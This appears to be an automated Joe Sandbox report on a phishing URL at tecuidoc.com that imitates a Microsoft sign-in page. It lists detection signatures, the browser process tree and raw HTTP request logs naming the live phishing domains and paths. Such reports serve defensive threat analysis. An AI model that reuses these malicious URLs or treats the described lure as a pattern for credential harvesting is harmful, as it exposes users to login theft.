Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://srmcorp.tecuidoc.com/?PSZlk=ViP

Overview

General Information

Sample URL:https://srmcorp.tecuidoc.com/?PSZlk=ViP
Analysis ID:1432193
Infos:

Detection

HTMLPhisher
Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Phishing site detected (based on favicon image match)
Yara detected HtmlPhish54
Phishing site detected (based on image similarity)
Found iframes
HTML body contains low number of good links
HTML page contains hidden URLs or javascript code
HTML title does not match URL
Submit button contains javascript call

Classification

  • System is w10x64
  • chrome.exe (PID: 1096 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
    • chrome.exe (PID: 5372 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 --field-trial-handle=2212,i,6787345325031674847,628112371274147507,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • chrome.exe (PID: 6008 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://srmcorp.tecuidoc.com/?PSZlk=ViP" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.2.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    1.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      1.6.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        1.3.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
          No Sigma rule has matched
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          Phishing

          barindex
          Source: https://tecuidoc.comMatcher: Template: microsoft matched with high similarity
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueMatcher: Template: microsoft matched with high similarity
          Source: Yara matchFile source: 0.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.5.pages.csv, type: HTML
          Source: Yara matchFile source: 1.6.pages.csv, type: HTML
          Source: Yara matchFile source: 1.3.pages.csv, type: HTML
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueMatcher: Found strong image similarity, brand: MICROSOFT
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: Iframe src: https://0a413710-7d4f53f3.tecuidoc.com/Prefetch/Prefetch.aspx
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: Iframe src: https://0a413710-7d4f53f3.tecuidoc.com/Prefetch/Prefetch.aspx
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: Iframe src: https://0a413710-7d4f53f3.tecuidoc.com/Prefetch/Prefetch.aspx
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: Number of links: 0
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: Number of links: 0
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViPHTTP Parser: Base64 decoded: a[href="http://www.salidzini.lv/"][style="display: block; width: 88px; height: 31px; overflow: hidden; position: relative;"]
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: Title: Sign in to your account does not match URL
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: Title: Create account does not match URL
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: On click: HOSTUI.evt_inlineBack_onclick();
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: <input type="password" .../> found
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: <input type="password" .../> found
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViPHTTP Parser: No favicon
          Source: https://0a413710-7d4f53f3.tecuidoc.com/Prefetch/Prefetch.aspxHTTP Parser: No favicon
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: No <meta name="author".. found
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: No <meta name="author".. found
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: No <meta name="author".. found
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: No <meta name="author".. found
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: No <meta name="author".. found
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
          Source: https://srmcorp.tecuidoc.com/?PSZlk=ViP&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: No <meta name="copyright".. found
          Source: https://signup.tecuidoc.com/signup?sru=https%3a%2f%2fl1ve.tecuidoc.com%2foauth20_authorize.srf%3flc%3d1033%26client_id%3d51483342-085c-4d86-bf88-cf50c7252078%26mkt%3dEN-US%26opid%3dB6E95959DB8DBA86%26opidt%3d1714143427%26uaid%3d86a53df4895b44e08756194225f0ef29%26contextid%3d5ABD0222F1D086D5%26opignore%3d1&mkt=EN-US&uiflavor=web&lw=1&fl=easi2&client_id=51483342-085c-4d86-bf88-cf50c7252078&uaid=86a53df4895b44e08756194225f0ef29&suc=https%3a%2f%2f2a9e5726-7d4f53f3.tecuidoc.com&lic=1HTTP Parser: No <meta name="copyright".. found
          Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.6:49711 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 173.222.162.64:443 -> 192.168.2.6:49698 version: TLS 1.2
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 23.204.76.112
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.64
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /?PSZlk=ViP HTTP/1.1Host: srmcorp.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
          Source: global trafficHTTP traffic detected: GET /?PSZlk=ViP HTTP/1.1Host: srmcorp.tecuidoc.comConnection: keep-aliveCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://srmcorp.tecuidoc.com/?PSZlk=ViPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/BssoInterrupt_Core_ChpboAn7HyXj89A22M8mzg2.js HTTP/1.1Host: eccd3fea-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://srmcorp.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1Sec-WebSocket-Key: z7viM0HUoFol1ipMJjwh7A==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /?PSZlk=ViP&sso_reload=true HTTP/1.1Host: srmcorp.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://srmcorp.tecuidoc.com/?PSZlk=ViPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
          Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: srmcorp.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/?PSZlk=ViPAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1
          Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://srmcorp.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/ConvergedLogin_PCore_jHSrlUosdD1xxbmcR_lMNA2.js HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://srmcorp.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_l2bvdjfwt697xziuhxpwsg2.js HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://srmcorp.tecuidoc.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /Me.htm?v=3 HTTP/1.1Host: l1ve.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /7d4f53f33e0f490ca63a57a3f299e2af/ HTTP/1.1Host: srmcorp.tecuidoc.comConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://srmcorp.tecuidoc.comSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1Sec-WebSocket-Key: CliIjj9qMQL/zo1vDoBuQQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_7f0a8c2a247460fad87f.js HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /Prefetch/Prefetch.aspx HTTP/1.1Host: 0a413710-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
          Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: 7e55e394-7d4f53f3.tecuidoc.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://srmcorp.tecuidoc.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: wDwqvv="N2Q0ZjUzZjMtM2UwZi00OTBjLWE2M2EtNTdhM2YyOTllMmFmOmFkMDVlZDk0LThjMzItNDg2My05NTU2LTUxNTliN2U1MDcxOA=="
